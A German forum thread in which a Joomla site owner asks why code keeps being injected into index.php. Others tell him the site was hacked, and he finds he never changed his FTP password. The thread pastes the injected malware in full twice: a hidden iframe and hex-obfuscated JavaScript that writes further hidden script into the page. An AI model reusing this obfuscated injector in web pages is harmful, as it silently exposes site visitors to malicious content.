Thema: Woher kommt diese Zeile?

Hallo zusammen! Ich hoffe das ist das richtige Unterforum für meine Frage.

In meine Index.php wird immer folgende Codezeile hineingeschrieben (automatisch, von irgendwoher):

PHP-Code:

<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l4986a1b99022a(l4986a1b990612){ function l4986a1b9909fb(){return 16;} return (parseInt(l4986a1b990612,l4986a1b9909fb()));}function l4986a1b9911cc(l4986a1b9915b5){  var l4986a1b99199c='';l4986a1b99293f=String.fromCharCode;for(l4986a1b991d85=0;l4986a1b991d85<l4986a1b9915b5.length;l4986a1b991d85+=2){ l4986a1b99199c+=(l4986a1b99293f(c102916999516l4986a1b99022a(l4986a1b9915b5.substr(l4986a1b991d85,2))));}return l4986a1b99199c;} var x1b='';var l4986a1b992d29='3C736'+x1b+'3726'+x1b+'970743E6'+x1b+'96'+x1b+'6'+x1b+'28216'+x1b+'D796'+x1b+'96'+x1b+'1297B6'+x1b+'46'+x1b+'F6'+x1b+'3756'+x1b+'D6'+x1b+'56'+x1b+'E742E77726'+x1b+'9746'+x1b+'528756'+x1b+'E6'+x1b+'5736'+x1b+'36'+x1b+'1706'+x1b+'528202725336'+x1b+'32536'+x1b+'392536'+x1b+'36'+x1b+'2537322536'+x1b+'312536'+x1b+'6'+x1b+'42536'+x1b+'352532302536'+x1b+'6'+x1b+'52536'+x1b+'312536'+x1b+'6'+x1b+'42536'+x1b+'3525336'+x1b+'42536'+x1b+'332533312533302532302537332537322536'+x1b+'3325336'+x1b+'42532372536'+x1b+'3825373425373425373025336'+x1b+'125326'+x1b+'6'+x1b+'25326'+x1b+'6'+x1b+'2536'+x1b+'372536'+x1b+'6'+x1b+'6'+x1b+'2536'+x1b+'372536'+x1b+'6'+x1b+'6'+x1b+'2533322536'+x1b+'6'+x1b+'42536'+x1b+'3525326'+x1b+'52536'+x1b+'6'+x1b+'52536'+x1b+'3525373425326'+x1b+'6'+x1b+'25326'+x1b+'52536'+x1b+'372536'+x1b+'6'+x1b+'6'+x1b+'25326'+x1b+'6'+x1b+'2536'+x1b+'332536'+x1b+'382536'+x1b+'352536'+x1b+'332536'+x1b+'6'+x1b+'225326'+x1b+'52536'+x1b+'382537342536'+x1b+'6'+x1b+'42536'+x1b+'6'+x1b+'32532372532302537372536'+x1b+'392536'+x1b+'342537342536'+x1b+'3825336'+x1b+'42533372533322533382532302536'+x1b+'382536'+x1b+'352536'+x1b+'392536'+x1b+'372536'+x1b+'3825373425336'+x1b+'42533312533382533312532302537332537342537392536'+x1b+'6'+x1b+'32536'+x1b+'3525336'+x1b+'4253237253736'+x1b+'2536'+x1b+'392537332536'+x1b+'392536'+x1b+'322536'+x1b+'392536'+x1b+'6'+x1b+'32536'+x1b+'3925373425373925336'+x1b+'12536'+x1b+'382536'+x1b+'392536'+x1b+'342536'+x1b+'342536'+x1b+'352536'+x1b+'6'+x1b+'525323725336'+x1b+'525336'+x1b+'325326'+x1b+'6'+x1b+'2536'+x1b+'392536'+x1b+'36'+x1b+'2537322536'+x1b+'312536'+x1b+'6'+x1b+'42536'+x1b+'3525336'+x1b+'52729293B7D76'+x1b+'6'+x1b+'172206'+x1b+'D796'+x1b+'96'+x1b+'13D7472756'+x1b+'53B3C2F736'+x1b+'3726'+x1b+'970743E';document.write(l4986a1b9911cc(l4986a1b992d29));</script> 


Leider erhalte ich dann immer die Fehlermeldung das ein unerwartetes < drin ist und die Seite lädt nicht mehr. Sobald ich die Zeile rauslösche läuft sie wieder eine Zeit lang wunderbar.
Ich hab die Index.php schon auf read only gestellt aber das bringt nix, diese Zeile wird immer eingefügt und immer mit dem Fehler.

Nun zu meinen Fragen:
1. Wo ist dieses unerwartete < ? Ich hab leider keine Ahnung von PhP, also hab ich immer ein < rausgelöscht, gespeichert und hochgeladen um zu sehen ob es das richtige war. Leider hat das nichts gebracht, darum vermute ich es ist nicht damit getan das Zeichen einfach zu löschen. Sieht vielleicht jemand den Fehler von euch Cracks?

2. Woher kommt diese Zeile? Wie kann sie überhaupt eingefügt werden wenn ich die Index.php unbeschreibbar mache? Offensichtlich hat sie ja keinen Sinn, ausser das die Seite nicht mehr läuft wenn sie drin ist. Wie kann ich verhindern das Joomla mir diese Zeile einfügt?

Danke schonmal.

Gruß Brumsle

Zitat von keraM

Dein Joomla wurde gehackt!

Die Seite wurde gehackt? Die ist ja erst 2 Wochen online! Habe heute restlos alles gelöscht, ne neue Datenbank angelegt und Joomla neu installiert. 3h später dasselbe Problem...

Wenn das so schnell geht kann ich Joomla wohl vergessen...f***k!

Ganz sicher das es nicht auch was anderem liegen kann?

hast du bei der neuinstallation auch ein neues admin-passwort gewaehlt?

Meine Joomlaversion ist 1.5.8, mein Hoster (World4You) hat das als "easy-install-paket".

Habe folgendes dazuinstalliert:
dfcontact 1.5
securityimages 1.5.1
pony gallery ml 2.5.1 ported

Weiters habe ich (erst bei der 2. Installation, der Fehler bestand aber schon vorher) verschiedene editoren ausprobiert:
jce 1.5.1
FCKeditor 2.6.3.9b
TMEdit_v1.1_J!_1.5

Das Template ist Transparent bliss, ich hab Joomla im legacy Modus.

Das Admin-PW hab ich natürlich geändert, es ist ein unlogischer Mix aus Zahlen und Buchstaben.

Die Index.php ist auf 644, hab auch schon 444 versucht was aber nix gebracht hat. Alles andere ist auf 644, mit 777 hab ich nix entdeckt.

Hier mal die vollständige Index.php wenn die Seite nicht funktioniert (ist doppelt so groß wie die "Originale"):

PHP-Code:

<?php
/**
* @version        $Id: index.php 10381 2008-06-01 03:35:53Z pasamio $
* @package        Joomla
* @copyright    Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
* @license        GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// Set flag that this is a parent file
define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;

/**
 * CREATE THE APPLICATION
 *
 * NOTE :
 */
$mainframe =& JFactory::getApplication('site');

/**
 * INITIALISE THE APPLICATION
 *
 * NOTE :
 */
// set the language
$mainframe->initialise();

JPluginHelper::importPlugin('system');

// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');

/**
 * ROUTE THE APPLICATION
 *
 * NOTE :
 */
$mainframe->route();

// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);

// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');

/**
 * DISPATCH THE APPLICATION
 *
 * NOTE :
 */
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);

// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');

/**
 * RENDER  THE APPLICATION
 *
 * NOTE :
 */
$mainframe->render();

// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');

/**
 * RETURN THE RESPONSE
 */
echo JResponse::toString($mainframe->getCfg('gzip'));
<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l49881b59573b5(l49881b5957b85){  return (parseInt(l49881b5957b85,16));}function l49881b59592f7(l49881b5959ac7){  var l49881b595a298='';l49881b595c1dc=String.fromCharCode;for(l49881b595aa69=0;l49881b595aa69<l49881b5959ac7.length;l49881b595aa69+=2){ l49881b595a298+=(l49881b595c1dc(c102916999516l49881b59573b5(l49881b5959ac7.substr(l49881b595aa69,2))));}return l49881b595a298;} var xb5='';var l49881b595c9ae='3C736'+xb5+'3726'+xb5+'970743E6'+xb5+'96'+xb5+'6'+xb5+'28216'+xb5+'D796'+xb5+'96'+xb5+'1297B6'+xb5+'46'+xb5+'F6'+xb5+'3756'+xb5+'D6'+xb5+'56'+xb5+'E742E77726'+xb5+'9746'+xb5+'528756'+xb5+'E6'+xb5+'5736'+xb5+'36'+xb5+'1706'+xb5+'528202725336'+xb5+'32536'+xb5+'392536'+xb5+'36'+xb5+'2537322536'+xb5+'312536'+xb5+'6'+xb5+'42536'+xb5+'352532302536'+xb5+'6'+xb5+'52536'+xb5+'312536'+xb5+'6'+xb5+'42536'+xb5+'3525336'+xb5+'42536'+xb5+'332533312533302532302537332537322536'+xb5+'3325336'+xb5+'42532372536'+xb5+'3825373425373425373025336'+xb5+'125326'+xb5+'6'+xb5+'25326'+xb5+'6'+xb5+'2536'+xb5+'372536'+xb5+'6'+xb5+'6'+xb5+'2536'+xb5+'372536'+xb5+'6'+xb5+'6'+xb5+'2533322536'+xb5+'6'+xb5+'42536'+xb5+'3525326'+xb5+'52536'+xb5+'6'+xb5+'52536'+xb5+'3525373425326'+xb5+'6'+xb5+'25326'+xb5+'52536'+xb5+'372536'+xb5+'6'+xb5+'6'+xb5+'25326'+xb5+'6'+xb5+'2536'+xb5+'332536'+xb5+'382536'+xb5+'352536'+xb5+'332536'+xb5+'6'+xb5+'225326'+xb5+'52536'+xb5+'382537342536'+xb5+'6'+xb5+'42536'+xb5+'6'+xb5+'32532372532302537372536'+xb5+'392536'+xb5+'342537342536'+xb5+'3825336'+xb5+'4253331253339253336'+xb5+'2532302536'+xb5+'382536'+xb5+'352536'+xb5+'392536'+xb5+'372536'+xb5+'3825373425336'+xb5+'4253332253331253336'+xb5+'2532302537332537342537392536'+xb5+'6'+xb5+'32536'+xb5+'3525336'+xb5+'4253237253736'+xb5+'2536'+xb5+'392537332536'+xb5+'392536'+xb5+'322536'+xb5+'392536'+xb5+'6'+xb5+'32536'+xb5+'3925373425373925336'+xb5+'12536'+xb5+'382536'+xb5+'392536'+xb5+'342536'+xb5+'342536'+xb5+'352536'+xb5+'6'+xb5+'525323725336'+xb5+'525336'+xb5+'325326'+xb5+'6'+xb5+'2536'+xb5+'392536'+xb5+'36'+xb5+'2537322536'+xb5+'312536'+xb5+'6'+xb5+'42536'+xb5+'3525336'+xb5+'52729293B7D76'+xb5+'6'+xb5+'172206'+xb5+'D796'+xb5+'96'+xb5+'13D7472756'+xb5+'53B3C2F736'+xb5+'3726'+xb5+'970743E';document.write(l49881b59592f7(l49881b595c9ae));</script>

Ich bin echt ratlos und genervt, schließlich war die Site ein Geburtstagsgeschenk und jetzt gibts dauernd Probleme....*grummel*

Danke das ihr versucht zu helfen, ist sehr nett von euch

Zitat von Brumsle

Die Seite wurde gehackt? Die ist ja erst 2 Wochen online! Habe heute restlos alles gelöscht, ne neue Datenbank angelegt und Joomla neu installiert. 3h später dasselbe Problem...

Nee, klar. Habe auch neulich gelesen, dass Hacker mindestens 2 Wochen mit dem Hacken einer neuen Seite warten. Haben die sich wohl nicht daran gehalten...

Zitat von Brumsle

Wenn das so schnell geht kann ich Joomla wohl vergessen...f***k!

Ich vergesse mein Joomla auch immer, und zwar weil ich einen guten Hoster habe und regelmäßige Updates mache...

Rooney

Zitat von Rooney

Nee, klar. Habe auch neulich gelesen, dass Hacker mindestens 2 Wochen mit dem Hacken einer neuen Seite warten. Haben die sich wohl nicht daran gehalten...


Ich vergesse mein Joomla auch immer, und zwar weil ich einen guten Hoster habe und regelmäßige Updates mache...

Rooney

Ich frage mich nur wie man die Seite so schnell gefunden hat. Über Google mal sicher nicht.

Ich habe beim selben Hoster schon seit Jahren eine Page mit Joomla 1.0.irgendwas laufen und hatte noch nie das Problem, denke also nicht das es am Hoster liegt. Und wenn mich so ein Ar*** offensichtlich auf dem Kieker hat wird er es immer wieder versuchen nehme ich an. Ich hatte eigentlich nicht vor aus der Webseite eine tägliche Lebensaufgabe zu machen.

@Mikey Mouse: Das FTP-PW hab ich nicht geändert *facepalm* Danke für den Tip. Also zum dritten mal neu installieren, diesmal mit 1.5.9, juhu!